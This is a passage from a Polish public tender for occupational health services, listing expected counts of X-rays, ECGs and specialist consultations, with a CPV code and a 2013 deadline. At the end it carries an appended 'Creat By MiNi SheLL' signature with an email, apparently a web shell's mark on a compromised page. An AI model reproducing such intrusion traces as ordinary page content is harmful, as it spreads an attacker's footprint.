21	MOCZ BADANIE OGÓLNE	szt.	375
	
	
BADANIA DODATKOWE	
		
Lp	Rodzaj Badania	JM	Przewidywana Ilość badań
1	RTG KRĘGOSŁUPA SZYJNEGO	 szt	10
2	RTG KRĘGOSŁUPA PIERSIOWEGO (DWIE PROJEKCJE)	szt 	8
3	RTG KRĘGOSŁUPA LĘDŹWIOWO KRZYŻOWEGO (DWIE PROJEKCJE)	 szt	10
4	RTG KLATKI PIERSIOWEJ +OPIS	szt.	380
	
			
			
	KONSULTACJE SPECJALISTYCZNE		
			
Lp	Rodzaj Badania	JM	Przewidywana Ilość badań
			
1	KONSULTACJA OKULISTYCZNA	szt.	370
2	KONSULTACJA LARYNGOLOGICZNA	szt.	350
3	AUDIOGRAM	szt.	165
4	EKG + OPIS 	szt.	375
5	KONSULTACJA PULMUNOLOGICZNA	szt.	10
6	SPIROMETRIA	szt.	55
7	KONSULTACJA ORTOPEDYCZNA	szt.	5
8	KONSULTACJA DERMATOLOGICZNA	szt.	10
9	KONSULTACJA PSYCHIATRYCZNA	szt.	20
10	KONSULTACJA NEUROLOGICZNA	szt.	120
11	BADANIE LEKARZA MEDYCYNY PRACY-BADANIE WSTĘPNE, OKRESOWE, KONTROLNE-ZAKOŃCZONE WYSTAWIENIEM ZAŚWIADCZENIA	szt.	375
12	BADANIE LEKARZA UPRAWNIONEGO DO PRZEPROWADZENIA BADAŃ W ZAKRESIE PRACY PRZY NARAŻENIU NA MIKROFALE + WYDANIE ZAŚWIADCZENIA	szt.	5
13	BADANIE LEKARSKIE DO CELÓW SANITARNO- EPIDEMIOLOGICZNYCH+ WYDANIE ZAŚWIADCZENIA	szt.	15
14	BADANIE KIEROWCÓW (konsultacje specjalistyczne) + WYDANIE ZAŚWIADCZENIA	pakiet	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com